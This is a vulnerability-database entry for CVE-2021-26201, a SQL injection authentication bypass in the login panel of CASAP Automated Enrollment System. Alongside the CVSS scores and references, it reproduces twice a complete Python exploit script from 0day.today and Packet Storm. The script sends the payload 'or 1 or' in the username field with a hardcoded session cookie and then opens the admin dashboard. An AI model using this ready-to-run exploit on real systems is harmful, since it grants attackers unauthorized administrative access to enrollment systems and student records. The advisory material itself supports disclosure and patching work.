Description
The Login Panel of CASAP Automated Enrollment System 1.0 is vulnerable to SQL injection authentication bypass. An attacker can obtain access to the admin panel by injecting a SQL query in the username field of the login page.
Affected Software
Related
{"id": "CVE-2021-26201", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-26201", "description": "The Login Panel of CASAP Automated Enrollment System 1.0 is vulnerable to SQL injection authentication bypass. An attacker can obtain access to the admin panel by injecting a SQL query in the username field of the login page.", "published": "2021-02-15T21:15:00", "modified": "2021-02-22T21:19:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26201", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/49463"], "cvelist": ["CVE-2021-26201"], "immutableFields": [], "lastseen": "2022-03-23T15:35:06", "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0086"]}, {"type": "exploitdb", "idList": ["EDB-ID:49463"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161615"]}, {"type": "zdt", "idList": ["1337DAY-ID-35889"]}], "rev": 4}, "score": {"value": 4.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0086"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161615"]}, {"type": "zdt", "idList": ["1337DAY-ID-35889"]}]}, "exploitation": null, "vulnersScore": 4.5}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:casap_automated_enrollment_system_project:casap_automated_enrollment_system:1.0"], "cpe23": ["cpe:2.3:a:casap_automated_enrollment_system_project:casap_automated_enrollment_system:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "casap_automated_enrollment_system_project:casap_automated_enrollment_system", "version": "1.0", "operator": "eq", "name": "casap automated enrollment system project casap automated enrollment system"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:casap_automated_enrollment_system_project:casap_automated_enrollment_system:1.0:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.exploit-db.com/exploits/49463", "name": "https://www.exploit-db.com/exploits/49463", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"zdt": [{"lastseen": "2021-09-13T22:28:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "zdt", "title": "CASAP Automated Enrollment System 1.1 SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26201"], "modified": "2021-03-02T00:00:00", "id": "1337DAY-ID-35889", "href": "https://0day.today/exploit/description/35889", "sourceData": "# Exploit Title: CASAP Automated Enrollment System 1.1 - Authentication Bypass cookie session\r\n# Exploit Author: @nu11secur1ty\r\n# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html\r\n# Software Link:\r\nhttps://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip\r\n# Version: 1.1\r\n# Tested On: Ubuntu + XAMPP 7.3.2\r\n# Description: CASAP Automated Enrollment System 1.0 - Authentication\r\nBypass SQLi cookie session\r\n# Exploit Link:\r\nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26201\r\n# More: https://www.nu11secur1ty.com/2021/03/cve-2021-26201.html\r\n\r\n[Exploit]\r\n\r\n\r\nimport time\r\nimport sys\r\nimport requests\r\nimport webbrowser\r\n\r\n# Creator of the idea: Himanshu Shukla\r\nprint(\"Author: @nu11secur1ty\")\r\n\r\ndef authbypass(url):\r\n\r\n #Authentication Bypass\r\n s = requests.Session()\r\n #Set Cookie fot testing\r\n #PHPSESSID=3g6ghfl8i7qh190m4pq92fv262 #in my case from XSS attack\r\n cookies = {'PHPSESSID': 'inucrnag25j9h5hb826kovir0p'}\r\n\r\n print (\"[*]Attempting Authentication Bypass cookie session...\")\r\n time.sleep(1)\r\n\r\n values = {\"username\":\"'or 1 or'\",\"password\":\"\"}\r\n r=s.post(url+'login.php', data=values, cookies=cookies)\r\n p=s.get(url+'dashboard.php', cookies=cookies)\r\n\r\n #Check if Authentication was bypassed or not.\r\n logged_in = True if (\"true_admin\" in r.text) else False\r\n l=logged_in\r\n if l:\r\n print(\"[+]Authentication Bypass Successful...!\")\r\n else:\r\n print(\"[-]Failed cookie Authentication exploit!\")\r\n print(\"[-]Check Your URL\")\r\n\r\nif __name__ == \"__main__\":\r\n \r\n if len(sys.argv)!=2:\r\n print(\"You Haven't Provided any URL!\")\r\n print(\"Usage : python3 exploit.py <URL>\")\r\n print(\"Example : python3 exploit.py http://IP_or_domain/final/\")\r\n exit()\r\n try:\r\n authbypass(sys.argv[1])\r\n webbrowser.open('http://10.10.10.100/final/dashboard.php')\r\n except:\r\n\r\n print(\"[-]Invalid URL!\")\r\n exit()\r\n\r\n# BR @nu11secur1ty\n\n# 0day.today [2021-09-14] #", "sourceHref": "https://0day.today/exploit/35889", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:15", "description": "An authentication bypass vulnerability exists in CASAP Automated Enrollment System. Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T00:00:00", "type": "checkpoint_advisories", "title": "CASAP Automated Enrollment System Authentication Bypass (CVE-2021-26201)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26201"], "modified": "2021-03-10T00:00:00", "id": "CPAI-2021-0086", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-03-02T16:39:40", "description": "", "cvss3": {}, "published": "2021-03-02T00:00:00", "type": "packetstorm", "title": "CASAP Automated Enrollment System 1.1 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26201"], "modified": "2021-03-02T00:00:00", "id": "PACKETSTORM:161615", "href": "https://packetstormsecurity.com/files/161615/CASAP-Automated-Enrollment-System-1.1-SQL-Injection.html", "sourceData": "`# Exploit Title: CASAP Automated Enrollment System 1.1 - \nAuthentication Bypass cookie session \n# Exploit Author: @nu11secur1ty \n# Date: 03.02.2021 \n# Vendor Homepage: \nhttps://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html \n# Software Link: \nhttps://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip \n# Version: 1.1 \n# Tested On: Ubuntu + XAMPP 7.3.2 \n# Description: CASAP Automated Enrollment System 1.0 - Authentication \nBypass SQLi cookie session \n# Exploit Link: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26201 \n# More: https://www.nu11secur1ty.com/2021/03/cve-2021-26201.html \n \n[Exploit] \n \n \nimport time \nimport sys \nimport requests \nimport webbrowser \n \n# Creator of the idea: Himanshu Shukla \nprint(\"Author: @nu11secur1ty\") \n \ndef authbypass(url): \n \n#Authentication Bypass \ns = requests.Session() \n#Set Cookie fot testing \n#PHPSESSID=3g6ghfl8i7qh190m4pq92fv262 #in my case from XSS attack \ncookies = {'PHPSESSID': 'inucrnag25j9h5hb826kovir0p'} \n \nprint (\"[*]Attempting Authentication Bypass cookie session...\") \ntime.sleep(1) \n \nvalues = {\"username\":\"'or 1 or'\",\"password\":\"\"} \nr=s.post(url+'login.php', data=values, cookies=cookies) \np=s.get(url+'dashboard.php', cookies=cookies) \n \n#Check if Authentication was bypassed or not. \nlogged_in = True if (\"true_admin\" in r.text) else False \nl=logged_in \nif l: \nprint(\"[+]Authentication Bypass Successful...!\") \nelse: \nprint(\"[-]Failed cookie Authentication exploit!\") \nprint(\"[-]Check Your URL\") \n \nif __name__ == \"__main__\": \n \nif len(sys.argv)!=2: \nprint(\"You Haven't Provided any URL!\") \nprint(\"Usage : python3 exploit.py <URL>\") \nprint(\"Example : python3 exploit.py http://IP_or_domain/final/\") \nexit() \ntry: \nauthbypass(sys.argv[1]) \nwebbrowser.open('http://10.10.10.100/final/dashboard.php') \nexcept: \n \nprint(\"[-]Invalid URL!\") \nexit() \n \n# BR @nu11secur1ty \n \n \n-- \nSystem Administrator - Infrastructure Engineer \nPenetration Testing Engineer \nExploit developer at https://www.exploit-db.com/ \nhttps://www.nu11secur1ty.com/ \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.com/> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161615/casapaes11-sql.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}